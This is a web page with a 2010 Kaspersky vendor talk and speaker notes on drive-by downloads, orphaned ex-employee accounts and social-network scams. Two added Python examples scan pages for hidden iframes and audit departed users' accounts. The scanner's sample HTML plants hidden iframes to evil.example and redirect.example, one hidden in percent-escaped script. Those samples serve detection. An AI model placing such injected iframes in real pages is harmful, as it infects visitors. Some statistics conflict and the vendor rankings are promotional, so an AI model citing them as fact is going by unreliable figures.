Real Business Threats!


It’s not news that threats are growing across the IT security landscape. Today’s malware imposes significant business risks due to the highly organized nature of attacks – applications, web sites, and social networks are all subject to attacks and vulnerabilities. Hackers are highly organized professionals with vast networks who are able to precisely target an unsuspecting victim, including many small businesses and their employees. Users may not even realize their machine has been compromised for days, weeks, or even months due to the nature of these attacks. During this talk, Mark Villinski will examine what this means for business owners and what IT managers need to look for to stay on top of these threats.

Mark Villinski, Kaspersky

Mark Villinski brings more than 12 years of technology sales and marketing experience to Kaspersky. Mark leads Field Marketing efforts for the East Coast and is responsible for increasing awareness and demand for Kaspersky’s Open Space Security Product Line. Prior to joining Kaspersky, Mark served as Director of Worldwide Channel Operations for Enterasys Networks, where he was responsible for the strategy and day-to-day operation of the Secure Advantage Partner Program. Prior to that role he held a number of channel and field marketing roles at Enterasys and Cabletron Systems. He started his high tech career in sales at Cabletron Systems.

Published in: Technology
  • According to The Top Cyber Security Risks, the number of attacks is now so large and the criminals’ sophistication is so great that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. The biggest problem in cyber security is being overwhelmed with all you need to focus on. In this presentation we’ll zero in on the threats and practical ways to protect your business from this risk. Today we’ll discuss how to protect against cyberthreats that matter to your business. The focus of this presentation is on small businesses with a small IT group, but these threats are no respecter of size. As an introduction to the facts and figures we’ll discuss in this presentation, let’s watch this short video that illustrates the exponential growth in Internet threats.
  • According to the “State of the Internet” report delivered by Websense, there has been a 233% increase in malicious web sites in the last 6 months. That is on top of a 671% increase in 2008. The Web is truly under siege. In today’s presentation we’ll discuss good sites that have gone bad, how this happens, and how to protect yourself from those sites. Next, we’ll discuss the forgotten security risk: the recently departed employee, perhaps a disgruntled employee. Finally, we’ll discuss Web 2.0, the new sharing, trusting world that is increasing risks for employees and employers.
  • Regulatory compliance and IT security are not always synonymous. You can easily be compliant with a regulatory body yet be very insecure. Many organizations look at malware protection as a check-box: “I have to have it and I have to maintain it, but that’s all I have to do!”
    The key point to understand about regulatory compliance is that it often involves a "top down" approach. There is typically a cookie-cutter template that defines the initiative, and you must look at your products and processes and try to figure out how they can mesh with the oddly shaped template handed down to you. Security, on the other hand, is a bottom-up initiative—when done correctly. Whether you are designing a software product or the architecture for your organization's new network, the key concept to remember is measure twice, cut once. When you are designing product architecture, for example, just as a good initial pass would describe communication, localization, versions, and so forth, so should it describe the security elements that need to be built into the application from day one (and which you should continue to investigate and refine throughout development).
    Compliance may provide an illusion of security to those that don’t understand the complexities of securing the digital business world, but it shouldn’t be the end goal.
    Background: The Children’s Internet Protection Act (CIPA) is a federal law enacted by Congress to address concerns about access to offensive content over the Internet on school and library computers. CIPA imposes certain types of requirements on any school or library that receives funding for Internet access or internal connections from the E-rate program, a program that makes certain communications technology more affordable for eligible schools and libraries. In early 2001, the FCC issued rules implementing CIPA.
    What CIPA requires: Schools and libraries subject to CIPA may not receive the discounts offered by the E-rate program unless they certify that they have an Internet safety policy that includes technology protection measures. The protection measures must block or filter Internet access to pictures that are: (a) obscene, (b) child pornography, or (c) harmful to minors (for computers that are accessed by minors). Before adopting this Internet safety policy, schools and libraries must provide reasonable notice and hold at least one public hearing or meeting to address the proposal. Schools subject to CIPA are required to adopt and enforce a policy to monitor online activities of minors. Schools and libraries subject to CIPA are required to adopt and implement an Internet safety policy addressing: (a) access by minors to inappropriate matter on the Internet; (b) the safety and security of minors when using electronic mail, chat rooms, and other forms of direct electronic communications; (c) unauthorized access, including so-called “hacking,” and other unlawful activities by minors online; (d) unauthorized disclosure, use, and dissemination of personal information regarding minors; and (e) measures restricting minors’ access to materials harmful to them. Schools and libraries are required to certify that they have their safety policies and technology in place before receiving E-rate funding. CIPA does not affect E-rate funding for schools and libraries receiving discounts only for telecommunications, such as telephone service. An authorized person may disable the blocking or filtering measure during any use by an adult to enable access for bona fide research or other lawful purposes. CIPA does not require the tracking of Internet use by minors or adults.
  • How are cybercriminals attacking the desktop today? They’re doing so with malware specifically designed to steal money and data and give cybercriminals control of systems inside the corporate network.
    CLICK 1: Writing malware for bragging rights is dead. Nowadays cyber criminals chase the money and have a lot of it to invest in developing new areas of attack (Bo Olsen, Malware Researcher). Attackers today are cyber-criminals looking to make money off of your data. Attackers no longer target the OS. They are after applications that contain data that can be used to make money! Threats come from many vectors: physical vectors (floppy disks, USB drives, CDs), email vectors (spam, web redirection, phishing), web vectors (drive-by downloads, malicious sites, liability). And they are targeting web sites as the weakest links. The primary web vulnerabilities, SQL injection and cross-site scripting (XSS), make up 80% of the exploited vulnerabilities. Because of these, your web site could be launching malware, serving malicious content to vulnerable client-side applications. If it’s poorly configured to keep hackers out, hackers will plant malicious code that proliferates malware to unsuspecting surfers. Not only will your users be hurt but Google will see it and block your website until you clean it, resulting in damage to your business. Vulnerable databases that hold user data can also be hacked. So can the software that creates a website, like Drupal, WordPress (the most insecure), and others. Your website is vulnerable because of these platforms. You must keep systems updated and patched.
    CLICK 2: Obfuscated (hidden, obscure) JavaScript, hidden in a legitimate website, redirects users’ connections to another server (in Estonia, Russia). This happens in the background without your knowledge. You are fingerprinted, which shows apps, OS, patch levels, etc., and an exploit is triggered to target a found vulnerability.
    CLICK 3: A backdoor trojan is loaded which gives the hacker access to put other things on your system, i.e., banker Trojans (programmed with a list of 100 banks; when you go to your bank the Trojan kicks in because it’s on the list, captures your info and uploads it to a remote server). This is the work of CYBERCRIMINALS.
  • CLICK 1: In this ComputerWorld article, financial institutions have become the target of attacks. Cybercriminals are attacking small banks and businesses using stolen passwords and account data to empty corporate accounts. This is happening because small and mid-sized businesses often lag behind in security spend, especially at the endpoint.
    800 computers had data destroyed in Norfolk, VA. $40 million in losses in 2009 for small businesses. United Shoreline Insurance lost $150K to one virus. Hilary Machinery lost $801,495 to cybercrime. Think it can’t happen to you? Think again.
    CLICK 2: This article from The Washington Post highlights the fact that public schools and universities have become targets as well, for much the same reasons. Case in point: Sanford School District, Colorado, lost $117,000 in a series of transfers just below $10K, below the bank’s radar. They recouped only $18K. Sand Springs School District, Oklahoma, lost approximately $150K in two fraudulent transfers. Marian University, Wisconsin, lost $189K in bogus transfers to money mules. They recovered only $54K. Money mules are people who sign up to “work at home” as “Financial Agents.” They are effectively money launderers without their knowledge. The Focus Group Inc. company, a Russian scam, is set up as a front for laundering stolen money. A school district in Illinois has also been hit, but the losses have not been disclosed as it is still an ongoing investigation. And the list of examples goes on because schools are seen as easy targets.
  • CLICK 1: Drive-by downloads deliver malware without your knowledge. They target client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office applications. Sometimes you don’t even have to click to open anything; you get infected just by visiting the web site.
    CLICK 2: Dirty web sites (sex, adult content, gambling, drugs, etc.) are getting dirtier: 69% have at least one malicious link. But it’s not the dirty web sites that carry the greatest risk. 77% of legitimate sites today have been compromised.
    CLICK 3: You can buy exploit code with a credit card on the Internet, making exploit code readily available, with support as well. And, if you’re really lazy . . .
    CLICK 4: You can buy a managed service that will provide to you the infrastructure and labor to roll out your malware.
    CLICK 5: Patching is still the biggest problem with companies today. PSI (Personal Software Inspector), a vulnerability scanner that returns unpatched apps, found that only 2% of all machines scanned are fully patched. Client-side applications are the target of these web vulnerabilities and must be patched. ActiveX allows IE to talk to third-party apps. It has many vulnerabilities, hard to find and hard to fix (registry edits required). Most computers have an ActiveX vulnerability and hackers are targeting them from malicious code on legitimate web sites. The applications being targeted because of their vulnerabilities are on 99% of PCs in the wild. Browser vulnerabilities are being targeted and must be patched. The plugins are full of vulnerabilities and must be patched as well. Kinda like being on a treadmill: always running but not getting anywhere.
  • CLICK 1: According to the Microsoft Security Intelligence Report (v7):
    - Almost any software contains vulnerabilities which can be exploited to deliver or distribute malicious code.
    - Browser and OS vulnerabilities are the most dangerous, but those attacks have gone down.
    - The largest number of known vulnerabilities is in third-party applications; this figure is higher because of the sheer amount of software available.
    CLICK 2: As you can see from this chart, Adobe still tops the charts in actual attacks, though Adobe has been doing better about patching its software.
    Audience poll: Do you know what version of Adobe Flash is running on every desktop? If so, how do you know? How do you patch for every version?
  • CLICK 1: This is a malicious PDF attachment. When you open it you see garbage, but in the background...
    CLICK 2: Obfuscated JavaScript is hidden inside the file. After it’s decompressed and deobfuscated with some special tools it looks like this.
    CLICK 3: Hidden in this JavaScript is shellcode that runs silently when the PDF is opened. Shellcode is raw machine code that the processor executes directly, with no interpreter in between. This PDF contained upwards of 5 separate PDF vulnerabilities that can do anything from password stealing to remote code execution. If you look at the bottom of the JavaScript example there is a section where it actually says "collectEmailInfo", which is just one of the previously known Adobe vulnerabilities which can be used as part of a buffer overflow, allowing the launch of any exe on your system. This happens silently without any authorization. You can get this PDF as an email attachment, or as a drive-by download from the web (a specially crafted web page auto-launches the PDF just by opening the site and then infects you).
  • The one bastion of security in the school system has been the Mac, until now.
    CLICK 1: More and more attacks are being seen against Macs.
    CLICK 2: One reason for this is the increasing market share for Mac. Mac now has over 10% of the market, making it a viable target.
    CLICK 3: Because more people are using them, it’s worth the time of the cybercriminal to attack these devices.
    CLICK 4: The rise in attacks has caused many AV vendors to produce AV products for the Mac, including KASPERSKY!!
    CLICK 5: Here’s one example: this site offers an HDTV program for Mac. You think you are getting MacCinema. What is downloaded is a trojan.
  • Here are examples of legitimate sites that have been compromised by cybercriminals:
    CLICK 1: Infected with Flash ads. The Flash ads served malware. High profile, high value web site.
    CLICK 2: CBS had a redirect to a Russian web site. High profile, not mom & pop. An IFrame (which isn't another Apple product; it stands for "inline frame") is just a way of loading one web page inside another, usually from a different server. That can be useful for building online applications. But malware writers can make the included page just one pixel square, meaning you can't even see it's there, and obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F, leaving no obvious clue that it's malicious.
    CLICK 3: Miami Dolphins site hacked during the Super Bowl. Anyone who visited was getting malware delivered to them. It tried to exploit known Microsoft vulnerabilities.
    CLICK 4: Business Week hacked. The story was a year old, and Business Week had cleaned their site, but did not find the hole in this article. Hackers were using this to serve malware and redirect traffic in the background, pulling exploits from Russia through Business Week.
    CLICK 5: Site where Google will tell you if you’ve hosted malware. Blogspot is owned by Google. As you can see they were also hacked and serving up nasty stuff. It is vital to have your web sites locked down and protected but also to have your employees protected while surfing the web.
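As an added illustration (not code from the original talk or from Kaspersky), the scanner below shows how a site owner can check their own pages for the two tricks described in this note: an iframe sized or styled so nobody can see it, and markup hidden behind %xx escapes like the string quoted above. The sample HTML, host names and the escaped payload are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page (hypothetical host names, not any real site): a normal
# banner iframe, an injected 1x1 iframe, and a script whose <iframe> markup is
# hidden behind %xx escapes the way the note describes.
SAMPLE_HTML = """<html><body>
<h1>Team schedule</h1>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://evil.example/x.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22http://redirect.example/%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2F%69%66%72%61%6D%65%3E"));
</script>
</body></html>"""

# A run of %xx escapes; the snippet quoted in the note is exactly this shape.
PERCENT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2})+")


def decode_percent_runs(text):
    """Decode every run of %xx escapes in text, leaving everything else untouched."""
    return PERCENT_RUN.sub(lambda m: unquote(m.group(0)), text)


class _PageCollector(HTMLParser):
    """Collects iframe attributes and the raw text of each <script> element."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def _dimension(value):
    """Leading integer of a width/height attribute ('1', '0px'); None if absent."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def is_hidden_iframe(attrs):
    """True when the iframe is sized or styled so that a visitor cannot see it."""
    width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_hidden_iframes(html):
    """Return (where, src) for hidden iframes in the page and in decoded script text."""
    findings = []
    page = _PageCollector()
    page.feed(html)
    page.close()
    for attrs in page.iframes:
        if is_hidden_iframe(attrs):
            findings.append(("inline", attrs.get("src")))
    for script in page.scripts:
        decoded = decode_percent_runs(script)
        if decoded == script:
            continue  # no escapes, so nothing was hidden this way
        # Parse the decoded text as HTML to expose the iframe the escapes concealed.
        inner = _PageCollector()
        inner.feed(decoded)
        inner.close()
        for attrs in inner.iframes:
            if is_hidden_iframe(attrs):
                findings.append(("obfuscated-script", attrs.get("src")))
    return findings


if __name__ == "__main__":
    for where, src in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe ({where}): {src}")
```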
  • Password policies, while maybe not this stringent, are very necessary – not just for current employees but for departing employees as well.
  • While the number of compromised websites rose 44% in 2008, only 57% of all espionage/data theft comes from the Internet. That leaves room for other attack vectors. A huge threat to organizations today is the ex-employee, sometimes disgruntled, sometimes going to a competitor. These employees create hidden accounts prior to their departure.
    CLICK 1: A sysadmin was fired but kept access to a mutual fund company and blackmailed them.
    CLICK 2: An ex-employee took files and took them to his new employer: competitive data loss, a real case in process now.
    CLICK 3: Survey on how many ex-employees steal when they are leaving: 60% of exiting employees steal company data!! How much are you losing? Many companies right now are downsizing and laying off employees. How much corporate data is walking through the door?
  • CLICK 1: What makes him an insider on the outside?
    No policy to disable accounts and passwords. Where did they have access? Is there a checklist?
    No rules or policy for the return of company equipment. He still has all the data on the laptop/smart phone.
    Shared passwords and multi-user accounts. These can be exploited if one person leaves and the password is not changed. You should have a policy against shared passwords, but many don’t.
    CLICK 2: How do you protect your company from these ex-employees?
    Map out where the data is and who has access to it. You need to know where any data is and who can access it.
    Log who is accessing that data so you know who is going where.
    You can then spot unusual traffic and investigate, and change access for people that don’t need it.
    Make sure you have a policy to deal with ex-employees.
  • 850 executives, C-level, across all industries. Read the statistics from each bullet. Last point: an existing employee may know what the passwords were for an ex-employee and use them to steal data and pin it on the ex-employee.
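The orphaned-account checks described in the two notes above (accounts of departed people that were never disabled, accounts with no owner at all, and logins with such an account after the person left), written out as an added example that is not part of the original presentation; the HR roster, the directory export, the `user=... src=... result=...` log format and the three-day grace period are all constructed assumptions for the example.

```python
import re
from datetime import date, datetime

# Constructed sample data (hypothetical users, hosts and dates, not from any real
# organisation). HR knows who has left and when.
HR_ROSTER = {
    "asmith": {"left": None},                # current employee
    "jdoe":   {"left": date(2010, 2, 26)},   # left; account was never disabled
    "rlee":   {"left": date(2010, 3, 1)},    # left; account disabled correctly
}

# Export from the directory: which accounts exist and whether they are enabled.
DIRECTORY_ACCOUNTS = [
    {"user": "asmith", "enabled": True},
    {"user": "jdoe", "enabled": True},
    {"user": "rlee", "enabled": False},
    {"user": "svc-backup", "enabled": True},  # nobody in HR owns this one
]

# Authentication log in an assumed key=value format (constructed lines).
AUTH_LOG = """\
2010-03-02T08:05:11 user=asmith src=10.0.1.20 result=success
2010-03-03T18:41:07 user=jdoe src=10.0.1.44 result=success
2010-03-04T07:59:30 user=jdoe src=10.0.1.44 result=success
2010-03-04T12:10:02 user=rlee src=10.0.1.9 result=failure
2010-03-05T09:00:00 user=svc-backup src=10.0.2.7 result=success
"""

TODAY = date(2010, 3, 8)  # review date, constructed for the example
GRACE_DAYS = 3            # the "longer than three days" figure from the survey

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)


def parse_auth_log(text):
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "user": m["user"],
                           "src": m["src"], "result": m["result"]})
    return events


def review_accounts(roster, accounts, events, today, grace_days=GRACE_DAYS):
    """Return (user, issue, detail) findings for orphaned or misused accounts."""
    findings = []
    logins = {}
    for e in events:
        logins.setdefault(e["user"], []).append(e)
    for acct in accounts:
        user = acct["user"]
        person = roster.get(user)
        if person is None:
            # An enabled account with no owner is the classic orphan.
            if acct["enabled"]:
                findings.append((user, "no-owner", "enabled account with no HR record"))
            continue
        left = person["left"]
        if left is None:
            continue  # current employee: nothing to check here
        if acct["enabled"]:
            open_days = (today - left).days
            issue = "not-disabled" if open_days > grace_days else "pending-disable"
            findings.append((user, issue, f"{open_days} days after departure"))
        # Successful logins after the leave date: the ex-employee, or a colleague
        # who knows the password, is still using the account.
        used = [e for e in logins.get(user, [])
                if e["result"] == "success" and e["ts"].date() > left]
        if used:
            hosts = ", ".join(sorted({e["src"] for e in used}))
            findings.append((user, "used-after-departure",
                             f"{len(used)} successful logins from {hosts}"))
    return findings


def run_review():
    """Run the checks over the constructed data set."""
    return review_accounts(HR_ROSTER, DIRECTORY_ACCOUNTS, parse_auth_log(AUTH_LOG), TODAY)


if __name__ == "__main__":
    for user, issue, detail in run_review():
        print(f"{user:<12} {issue:<22} {detail}")
```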
  • Ashton Kutcher said “the social web is a giant ego stream of a generation being filtered through a black market in an effort to monetize the individual.” Ashton is correct. We are a number – a green one to cybercriminals. The Internet is a money-making machine. Unfortunately, the ones making the money are the criminals, bilking millions out of individuals and corporations. Let’s look at another way cybercriminals are stealing money.
  • CLICK 1: How are cybercriminals invading organizations today? Through a wide open port in the perimeter security that allows users to access the web for their daily tasks. Employees are shopping, doing online gaming, sharing personal information on dating sites, and exploring the Web 2.0 world: Facebook, YouTube, MySpace, etc. Companies and employees are heavily involved in social media today. Hundreds of companies are doing social media (sharing, talking, listening) but also propagating malware and crimeware. Social media is a breeding ground for crimeware!! The Web is truly under siege by cybercriminals today and it is, in many organizations, unblocked to the desktop.
    CLICK 2: The big ones are on the right. Everyone has a Facebook account, reaching out and sharing, hugging virtually, etc. 450K people are on Facebook, 50% of those every day. And many are doing Facebook from their office desks, opening the company to a serious risk. The endpoint must have adequate protection from web-borne cyber attacks as it is the new target for cybercriminals today.
    Facebook gives people the power to share and makes the world more open and connected. Millions of people use Facebook every day to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet. It’s a trusted environment: you’re only connected to the people you “approve” as your friends. It’s freaking awesome.
    According to Salaries.Com (2005), employees wasted 2.09 hours per day, the Internet being the area where the most time was wasted, resulting in $759 billion in lost salaries throughout a year. 48% of that time was on the Internet!
    126 million blogs. 27.3 million tweets per day. 475 million Facebook users, 50% online every day. 12.2 billion videos downloaded every month. 2.5 billion photos uploaded to Facebook every month.
  • CLICK 1: This is the Facebook site of Ryan Naraine, Kaspersky’s Security Evangelist and Chief Editor of Threatpost.
    SECOND CLICK: Ryan uses his Facebook to blog about security exploits.
    THIRD CLICK: Example of someone sharing a link. The link is shortened through Google, so you never see exactly where you are going. You have no idea if this link is malicious or not, but because it’s from a “trusted friend”, you click on it.
  • Here’s an example of how clicking on a link can be disastrous:
    CLICK ONE: Koobface. A network worm running on Windows systems. There are 60 new variants today since July 2008.
    CLICK TWO: Originally found on Facebook but now it’s occurring on Twitter and MySpace. It exploits this trusted-site kind of thing.
    CLICK THREE: Here’s what it looks like. Notice the redirector says Google to add more trust.
    CLICK FOUR: You click on the link and it looks like YouTube. Then it tells you that you need to update your Flash Player. If you run it, you get the malware. When you get it, you then start sending the same message to all of your friends and family. Makes you very popular!!
  • 1) The friendly 419 scam: The notorious 419 scams have sadly become ubiquitous on the Internet. While they began as e-mail cons, usually involving promises of a vast fortune from a Nigerian prince, they have morphed into a new and more sophisticated ploy that involves hijacking the Facebook account of a friend in order to fool kind souls into thinking they're helping a pal. Thieves use an account to garner sympathy as they claim to be in desperate need of cash, often because they've been robbed or detained while traveling abroad. One duped Missouri woman wound up handing over $4,000 before she realized she'd been had.
    2) Hidden fee apps: There are plenty of Facebook apps and quizzes with questionable motives and privacy policies, but there are some that are outright scams. Take, for instance, the sad tale of Leanne Saylor, who fell prey to scammers after taking a simple IQ quiz on the service. To receive her results, she was required to submit her cell phone number and wait for a text. When she didn't receive anything, Saylor entered her phone number two more times. When she opened her next cell phone bill, she discovered three charges from the app, totaling a whopping $44. AT&T blocked future fees, but Saylor learned the hard way that she should never give out her cell phone number to strangers, much less strange apps.
    3) Fake login pages: A particularly sneaky method of ensnaring Facebookers lies in the loads of phishing messages that lead to convincing-but-fake versions of the Facebook login page. Typically, these spam e-mails are brief and contain a link, usually ending in ".im" or ".at." (We received one that simply read, "Look at".) Once you enter your e-mail and password to 'log in,' it's game over; a hacker has control of your account and will quickly use it to perpetrate any one of the scams listed here. What's worse, they'll impersonate you to spread phishing e-mails to all of your friends.
    4) Malware links: Once an account is hijacked, it can be used to deluge that account holder's friends with messages containing links to malicious sites. It's rough stuff. These poisonous software packages leave you vulnerable to the theft of even more data, including all the passwords, account numbers and credit card information you may have entered into your PC. Recently, a barrage of spam messages featuring a link to "CoooooL Video" actually led to nothing but a nasty malware infection.
    5) Facebook apps that are malware: Creating Facebook applications has become so easy that hackers have created apps with the sole aim of tricking you into handing over your personal data or Facebook password. Some versions impersonate one of the standard Facebook features, like "Your Photos" and "Friend's Gifts," and send convincing notifications, like "someone has commented on your photo," or so-and-so "has posted on your wall." But clicking on them either leads to a fake login page, or a window asking for permission to access your Facebook account. These scams are particularly tough to spot because they mimic actual Facebook notifications. The only way to protect yourself is to look for tiny inconsistencies in the false apps (e.g., odd or incorrect icons, clunky wording and poor English usage). It seems your teacher wasn't lying after all when she said learning grammar was important.
    6) Reset password scam: The address of the sender is spoofed to display “support@facebook.com”. It tricks users into downloading a dangerous piece of malware, which downloads additional malicious files and joins the Bredolab botnet, giving the attacker control of your PC.
  • Digg is a news website, like Threatpost. Thousands of people post stories to Digg. If you click on a story you vote it to the top of the site. This story was getting a great deal of hits; the counter shows how many people clicked on the story. Anyone can comment on the story. One person put a link in his comment. You click on the link and you get malware!
  • It’s happening every day. Here are examples:
    CLICK ONE: New Facebook worm spreading.
    CLICK TWO: QuickTime worm spreading in MySpace.
    CLICK THREE: Malware being spread via bad Twitter profiles. My Twitter account has been targeted by bad users as well.
    CLICK FOUR: Online gaming passwords being stolen by worms, Taterf and Frethog.
    CLICK FIVE: Twitter hacks on high-profile users. (Don’t put anything in writing you don’t want the whole world to know.)
    CLICK SIX: Google exec in Australia. Was IMing in Facebook with a friend: “stranded in Australia – need help.” The Nigerians are getting Facebook accounts, logging in as them, and trying to get people to send them money, assuming the identity of the Facebook profile and bilking money from other people. They know everything about you from your Facebook account!!
  • So enough of the bad stuff. Here’s how to prevent it from happening to you.
    Patch! You need to stop it before you get infected. Identify the apps that are the most often attacked and make those the priority. Go to the link above to get this information. If it doesn’t patch itself, don’t use it. Firefox does. Keep your web server patched to keep it from serving up malware. Use more than one browser; this limits exposure. Distrust: it’s not her and it’s not hot. It’s malware.
    2nd bullet: Turn off services or block URLs that are not necessary for business. If they don’t need it at work, don’t give them access to it.
    Last bullet: You must have premium protection, like that of Kaspersky. Make sure your AV is updating often so you get the latest protection.
  • Update Frequency: An AV solution is only as good as its last update. With 3500+ signatures being created a day, it is critical that updates are timely and do not impact the performance of the system. Kaspersky updates more than anyone in the industry, 664 times per month, almost one per hour, making sure that our customers have the latest in protection while minimizing the impact of updates on system performance.
  • Response Time Ranking: According to Kaspersky, its responses to new threats are faster than anyone else’s in the industry, dramatically reducing the window of vulnerability for our customers.
  • Kaspersky received the Advanced+ rating from AV-Comparatives for both detection and removal of malware, both equally important. In the latest VB100 testing Kaspersky received one of the highest RAP (Reactive and Proactive detection) scores, indicating Kaspersky’s strong malware detection capabilities. The graph above depicts how we stack up against the competition. In the November 2009 test of antivirus software, performed by Anti-Malware Test Lab across 19 different vendors, Kaspersky was awarded the GOLD Zero-day Protection Award. Kaspersky did much better than the competitors tested. Kaspersky is the only vendor that took GOLD in all 10 categories tested.
  • [5. SUPPORT] Kaspersky has world-class support for the Americas based in Boston, MA, not offshore. We support multiple languages and ensure that our customers speak to a knowledgeable engineer right away to solve their problems. Our hold times are less than 5 minutes, something that is unheard of in this industry. And our standard phone support, 8 AM to 9 PM EST, is FREE!!
  • As you can see, Kaspersky truly does offer PREMIUM protection where your business happens. For us, premium means:
    Recognition from industry leaders like Microsoft, Juniper and Check Point validates the quality of our technology.
    Independent testing labs have year after year continually ranked Kaspersky at the top when it comes to detection and prevention.
    We have consistently delivered the most immediate protection available, responding rapidly to minimize the window of vulnerability.
    Our very small footprint, small updates and impressive scanning speeds mean the best protection doesn’t have to impact your productivity.
    Deploying and managing Kaspersky is intuitive and easy to do, yet comprehensive. And we are 100% dedicated to making our customers lifetime customers, with the care and support you require.
    Kaspersky is the complete end-to-end anti-malware solution that delivers premium protection and excellent support to keep your business secure wherever it happens. You can trust Kaspersky Lab.
  • Real Business Threats!

    1. 1/30/2015 Copyright 2010. All Rights Reserved.
    2. • Good sites gone bad
         o Web under siege (designer malware, drive-by downloads)
         o The un-patched Windows ecosystem
         o Legitimate sites launching attacks
       • Revenge of the recently departed
         o The insider on the outside
         o Managing orphaned accounts
       • Friend or fraud
         o The good/bad of Web 2.0
         o Exploiting trust on social networks
         o Recommendations
    3. The World of “Check Boxes”
    4. The Growing Malware Threat [chart: growth from 1998 to 2009, y-axis 0 to 3,200,000] 30,000 new threats per day; 3,500+ new signatures per day; 1,115 mobile malware signatures as of December 2009; 3,312,682 total as of December 2009
    5. • Professionally targeted to weakest links
         ― Poorly configured Web servers
         ― Vulnerable publishing platforms
         ― Un-patched Internet-facing databases
       • Obfuscated JavaScript code inserted on hacked Web pages
         ― Redirects to remote server hosting exploits
         ― Serves custom malware based on Windows OS version, browser version, patch level, vulnerable third party apps
         ― Fires exploits simultaneously at IE, WinZip, Java, QuickTime, ActiveX controls, even Firefox … until exploit hits target
       • Payload: Backdoor Trojans, password stealers, banker Trojans, spam bots
         ― This is the work of highly skilled, well-organized cyber criminals
    6. • Hacked Web sites deliver drive-by downloads
         ― It’s no longer just “dirty” Web sites
         ― 77 percent of Web sites with malicious code are legitimate sites that have been compromised
       • Vulnerabilities/exploits are ready-made, publicly available
       • The (un-patched) state of Windows
         ― Secunia PSI statistics: Only 2% of Windows computers fully patched
         ― ActiveX control vulnerabilities hard to find, fix
         ― The Adobe Acrobat/PDF, Flash, RealPlayer, WinZip and QuickTime monocultures
         ― Browser flaws everywhere: IE, Firefox, Safari, Opera
         ― Browser plug-ins: A bigger nightmare
    7. Client Side Application Vulnerability
    8. Popularity Makes MAC a Growing Target
       • Mac users now make up 10% of the marketplace
       • They are now more attractive to cybercriminals – worth the trouble due to the numbers
       • Major AV vendors have or are releasing AV products for the Mac
       • An example – MacCinema
    9. • Insider on the outside
         o Failure to disable passwords and accounts
         o Relaxed rules for the return of company equipment
         o Exploiting shared passwords in multiple-user accounts
       • Questions to ponder around orphaned accounts
         o Where’s the data? Who has access to it?
         o Are you logging all access to that data?
         o Can you spot unusual data traffic?
         o Does your password policy cover ex-employees?
    10. • Symark International surveyed 850 security, IT, HR and C-level executives across all industries. Here’s what they found:
          o 42% of businesses do not know how many orphaned accounts exist within their organization
          o 30% have no procedure in place to locate orphaned accounts
          o 27% said that more than 20 orphaned accounts currently exist within their organization
          o More than 30% said it takes longer than three days to terminate an account after an employee or contractor leaves the company, while 12 percent said it takes longer than one month
          o 38% said that they had no way of determining whether a current or former employee used an orphaned account to access information
    11. The Endpoint is the New Perimeter
    12. • Net-Worm.Win32.Koobface
          o Created in July 2008
          o Variants still squirming in 2009
        • Net-worm that exploits trust on Facebook and Myspace
    13. Multiple Attack Vectors
        • The Friendly 419 Scam
        • Hidden Fee Apps
        • Fake Login Pages
        • Malware Links
        • Facebook Apps that are Malware
        • Reset Password Email
    14. • Be proactive about security:
          ― Patch! Patch! Patch!
          ― Identify commonly exploited third-party apps and keep those updated as a priority. Stay away from programs without auto-update mechanisms
          ― Your web site can be an exploit site! Stay on top of high-priority patches for Web servers and all components
        • Shut off all unnecessary network services and block employees/students from social networks
          ― Hackers prey on the "trusted" nature of these networks to trick users into installing malware on endpoints. If certain employees don't need Internet access, don't provide it
        • Implement strong malware protection throughout your organization!!
    15. Endpoints, Mail Servers, Internet Gateways
    16. Small Updates for the Best Protection and User Experience [chart: updates per month, y-axis 0 to 700; vendors Microsoft, Symantec, Trend Micro, CA, McAfee; plotted values 24, 28, 32, 33, 138]
    17. [chart: response time in hours, y-axis 0 to 8; vendors Eset, Sophos, AVG, Symantec, McAfee; plotted ranges 4 to 8 hours, 4 to 6 hours, 4 to 6 hours, 2 to 4 hours, 2 to 4 hours, < 2 hours]
    18. Short Hold Times; Proactive; Dedicated Engineers; High-touch; Free Standard Support; Multiple Languages
    19. Premium Protection Where Your Business Happens: Trusted by the Leaders in the Industry; Top-Rated Malware Detection Rates; Fastest to Respond to New Threats; Built for the Best Possible User Experience; Intuitive & Easy to Deploy and Manage; World-Class Quality Support